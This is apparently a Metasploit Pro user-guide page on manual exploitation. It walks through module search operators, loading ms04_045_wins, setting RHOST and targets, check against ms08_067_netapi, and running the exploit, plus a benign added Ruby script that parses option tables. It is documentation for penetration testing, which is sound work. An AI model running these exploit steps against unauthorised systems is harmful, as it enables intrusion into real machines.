Manual Exploitation
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. The most common types of exploit modules are buffer overflow and SQL injection exploits.
To manually run an exploit, you must choose and configure an exploit module to run against a target. You choose the exploit module based on the information you have gathered about the host. For example, if you know that the target is missing the MS08-067 patch and has port 445/139 open, you can run the MS08-067 exploit to attempt exploitation.
Module Search
Before you can configure and run an exploit, you need to search for the module. The console includes the ability to search for modules using search operators.
You use search operators to create a query based on a specific module name, path, platform, author, CVE ID, BID, OSDVB ID, module type, or application. The search returns a list of results that match the query.
The following are search operators that are available:
- name
- path
- platform
- type
- app
- author
- cve
- bid
- osdvb
Search Syntax
To search for a module, use the following syntax:
$ search <search operator>:<search term>
Searching for a Module
Use the search command along with a search operator to search for a module.
msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067
Showing All Exploit Modules
Use the show command to view a list of the exploits that are available.
msf-pro > show exploits
This can take a few minutes. There are thousands of modules.
Loading a Module
Use the use command to load an exploit module. After you issue the use command, the Metasploit Console changes the command prompt to show the loaded module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) >
You can use the Tab key to complete the module path.
Resetting the Current Module Context
Use the back command to reset the prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >
Showing Options for a Module
Use the show command to view a list of options that are available for a particular module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show options
Show Required Options
After an exploit is loaded, you need to set all the required options. To find out which required options are still unset, you can use the show missing command.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show missing
Showing Advanced Options for a Module
Use the show command to view a list of advanced options that are available for an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show advanced
Setting Options for a Module
Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:
msf-pro exploit (ms04_045_wins) > show options

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST
RPORT  445

msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1
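The following Ruby script is an added example (not Metasploit's own code and not part of this page) that reproduces what the show missing command reports from a show options table like the one above: it slices the fixed-width output by the header's column offsets, so the blank Current Setting cell for RHOST survives instead of being lost to a whitespace split, and then mimics set to show the required list emptying. The sample table is constructed for the example.

```ruby
# Added example, not Metasploit's own code: reproduce what `show missing`
# reports by parsing the fixed-width table that `show options` prints.
# Cells are sliced by the header's column offsets because a blank
# "Current Setting" (RHOST below) would disappear under a whitespace split.

# Constructed sample of `show options` output, modelled on the page's table.
SAMPLE_SHOW_OPTIONS = <<~OUT
  Module options (exploit/windows/wins/ms04_045_wins):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     RHOST                   yes       The target address
     RPORT  445              yes       The target port
OUT

HEADERS = ['Name', 'Current Setting', 'Required', 'Description'].freeze

# Parse the table into an array of { header => cell } hashes.
def parse_show_options(text)
  lines = text.lines.map(&:chomp)
  header = lines.find { |l| HEADERS.all? { |h| l.include?(h) } }
  return [] unless header
  starts = HEADERS.map { |h| header.index(h) }
  rows = lines[(lines.index(header) + 2)..]   # skip the header and dashes rows
  rows.reject { |l| l.strip.empty? }.map do |line|
    HEADERS.each_with_index.map do |h, i|
      from, to = starts[i], starts[i + 1]      # `to` is nil for the last column
      cell = to ? line[from...to] : line[from..]
      [h, (cell || '').strip]
    end.to_h
  end
end

# Names of required options that have no value yet: what `show missing` lists.
def missing_required(rows)
  rows.select { |r| r['Required'].casecmp?('yes') && r['Current Setting'].empty? }
      .map { |r| r['Name'] }
end

# Mimic `set NAME VALUE`; option names are matched case-insensitively.
def set_option(rows, name, value)
  rows.map { |r| r['Name'].casecmp?(name) ? r.merge('Current Setting' => value) : r }
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_show_options(SAMPLE_SHOW_OPTIONS)
  puts "missing before set: #{missing_required(rows).inspect}"   # ["RHOST"]
  rows = set_option(rows, 'rhost', '192.168.55.1')
  puts "missing after set:  #{missing_required(rows).inspect}"   # []
end
```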
Showing the Targets for a Module
Use the show targets command to view a list of potentially vulnerable targets. Most modules display a list of targets that may be vulnerable to the exploit. Each target has an ID and an operating system.
If you know the victim machine's operating system and version, you can specify the target for the exploit. Some modules provide an automatic targeting option. If you are unsure of the operating system or version, you can use the automatic targeting option, if it is available, to detect the victim machine's OS and version automatically.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets

Exploit targets:
Id  Name
--  -----
0   Windows 2000 English
Check to See if a Target is Vulnerable
Most exploits are version specific. For example, ms14_012_textrange is an exploit for Internet Explorer 9, but it only works against versions of IE9 that were built between July 2013 and February 2014. To use this exploit, you would need to know the exact MSHTML build the target is using.
This is where the check command becomes very handy. You can use the check command to determine whether a target is vulnerable to a particular exploit without running the exploit itself.
msf-pro > use exploit/windows/smb/ms08_067_netapi
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
[+] 192.168.55.1:445 - the target is vulnerable.
Not all modules support the check command.
Setting the Target for an Exploit
Use the set target command to specify a target for the exploit.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets

Exploit targets:
Id  Name
--  -----
0   Windows 2000 English

msf-pro exploit (ms04_045_wins) > set target 0
Running an Exploit Module
Use the exploit or run command to run an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > run
Resetting the Current Module Context
Use the back command to reset the command prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >
Reloading an Exploit
Use the reload command to refresh the metadata and methods for an exploit. This command is handy if you've edited the module while in the module context and need to update the module.
msf-pro exploit (ms04_045_wins) > reload